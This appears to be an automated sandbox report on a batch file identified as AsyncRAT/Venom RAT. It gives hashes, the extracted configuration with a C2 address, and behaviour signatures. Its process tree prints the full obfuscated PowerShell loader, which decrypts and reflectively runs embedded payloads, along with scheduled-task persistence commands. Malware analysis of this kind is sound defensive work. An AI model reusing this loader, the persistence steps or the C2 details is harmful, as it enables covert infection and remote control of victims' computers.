Overview

overview

10

Static

static

1

Client.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    18s
  • max time network
    17s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-05-2024 15:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.bat

  • Size

    285KB

  • MD5

    d8cfc3f47a867b0e75997070c3281de8

  • SHA1

    141a013d4677b2c2453b429372d6373b1a187c63

  • SHA256

    85d20a24df655ec1f11e1c39f5f4d74dfce232321dbe6b41a5159a8cf6073ca1

  • SHA512

    9da1cc237a7c324457b3c72ee31403edea528c6bb82e2a464fd29be70a4bf50a7fceabfeefb408e317b8dc0100ec6ffe7575182b6c3e7fa91f2e4767bfb84eac

  • SSDEEP

    6144:VQJ7TjZvuij8u3zn0YXT59/MD7/QGWwNfmkDbWibZ5LPN2:VijZvuijfz8XbZNY

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

147.185.221.19:38173

Mutex

uuhaiushdishajkdhwuasudh

Attributes
  • delay

    1

  • install

    true

  • install_file

    svhost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BUKiAL31A5lT1/Xd5G5EmJWEX7sPvy0fexqhE5k6bBA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2NxhLszSFSKFC6LeW0LZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $teDyb=New-Object System.IO.MemoryStream(,$param_var); $JJOvu=New-Object System.IO.MemoryStream; $PzvNj=New-Object System.IO.Compression.GZipStream($teDyb, [IO.Compression.CompressionMode]::Decompress); $PzvNj.CopyTo($JJOvu); $PzvNj.Dispose(); $teDyb.Dispose(); $JJOvu.Dispose(); $JJOvu.ToArray();}function execute_function($param_var,$param2_var){ $bcxuR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mgbCE=$bcxuR.EntryPoint; $mgbCE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$TDoDY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client.bat').Split([Environment]::NewLine);foreach ($szRyi in $TDoDY) { if ($szRyi.StartsWith(':: ')) { $kbvkz=$szRyi.Substring(3); break; }}$payloads_var=[string[]]$kbvkz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_930_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_930.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4568
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_930.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_930.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4184
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BUKiAL31A5lT1/Xd5G5EmJWEX7sPvy0fexqhE5k6bBA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l2NxhLszSFSKFC6LeW0LZw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $teDyb=New-Object System.IO.MemoryStream(,$param_var); $JJOvu=New-Object System.IO.MemoryStream; $PzvNj=New-Object System.IO.Compression.GZipStream($teDyb, [IO.Compression.CompressionMode]::Decompress); $PzvNj.CopyTo($JJOvu); $PzvNj.Dispose(); $teDyb.Dispose(); $JJOvu.Dispose(); $JJOvu.ToArray();}function execute_function($param_var,$param2_var){ $bcxuR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mgbCE=$bcxuR.EntryPoint; $mgbCE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_930.bat';$TDoDY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_930.bat').Split([Environment]::NewLine);foreach ($szRyi in $TDoDY) { if ($szRyi.StartsWith(':: ')) { $kbvkz=$szRyi.Substring(3); break; }}$payloads_var=[string[]]$kbvkz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3480
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"' & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1636
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"'
                7⤵
                • Creates scheduled task(s)
                PID:4420
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6B2D.tmp.bat""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:636
              • C:\Windows\system32\timeout.exe
                timeout 3
                7⤵
                • Delays execution with timeout.exe
                PID:5064
              • C:\Users\Admin\AppData\Roaming\svhost.exe
                "C:\Users\Admin\AppData\Roaming\svhost.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:4884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    ee6f5f5e5924783870aeedeccdafe9da

    SHA1

    0e12ede20df5ec37f2bf3608ad1bc9b4649450fd

    SHA256

    ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416

    SHA512

    998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhq5cysd.l21.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp6B2D.tmp.bat
    Filesize

    150B

    MD5

    9db9bcc9ea4f3f07e0966c4376ac2e36

    SHA1

    dd7c215357d9d114c310fa2676a47132682ecb50

    SHA256

    f6575cb910adee8028321ff19eaaefc1868d4111ef1e46ad429e37d80c5f0319

    SHA512

    2e7ca77df6df61757a3fd5cdd70567d874563abd72ab69560bde6f5d749f8c1a202c10cc3215afa4f982f70055d1fbb9f37c0221614958b0e3bcbc6487ccd575

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_930.bat
    Filesize

    285KB

    MD5

    d8cfc3f47a867b0e75997070c3281de8

    SHA1

    141a013d4677b2c2453b429372d6373b1a187c63

    SHA256

    85d20a24df655ec1f11e1c39f5f4d74dfce232321dbe6b41a5159a8cf6073ca1

    SHA512

    9da1cc237a7c324457b3c72ee31403edea528c6bb82e2a464fd29be70a4bf50a7fceabfeefb408e317b8dc0100ec6ffe7575182b6c3e7fa91f2e4767bfb84eac

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_930.vbs
    Filesize

    115B

    MD5

    88ffb62e847c50c3ccc6842790416f97

    SHA1

    27b9db39bf9fbd67e5ead0f3595b3d0d5af6e7e8

    SHA256

    9c5ea95dbc5ec0ba5f13a543bc31779129eea4b5d95b587b5533cc9721df7342

    SHA512

    b6f4aca8e7b2e103089186e6a450e55bdbcb3de8d07b2789cb436790c5aaddc6b9cab4f5089a4aabc988179a2acaee48cb111fe33fbdfe276ffe4d089f51d5f8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\svhost.exe
    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    Download Submit

  • memory/1096-14-0x000001D2D3DC0000-0x000001D2D3DF8000-memory.dmp

    Filesize

    224KB

    Download

  • memory/1096-13-0x000001D2BBC50000-0x000001D2BBC58000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1096-51-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1096-0-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1096-12-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1096-11-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1096-1-0x000001D2D3D70000-0x000001D2D3D92000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3480-49-0x00000122E4F90000-0x00000122E4FA8000-memory.dmp

    Filesize

    96KB

    Download

  • memory/4568-30-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4568-18-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4568-17-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4568-16-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4884-68-0x0000027AFC320000-0x0000027AFC364000-memory.dmp

    Filesize

    272KB

    Download

  • memory/4884-69-0x0000027AFC740000-0x0000027AFC7B6000-memory.dmp

    Filesize

    472KB

    Download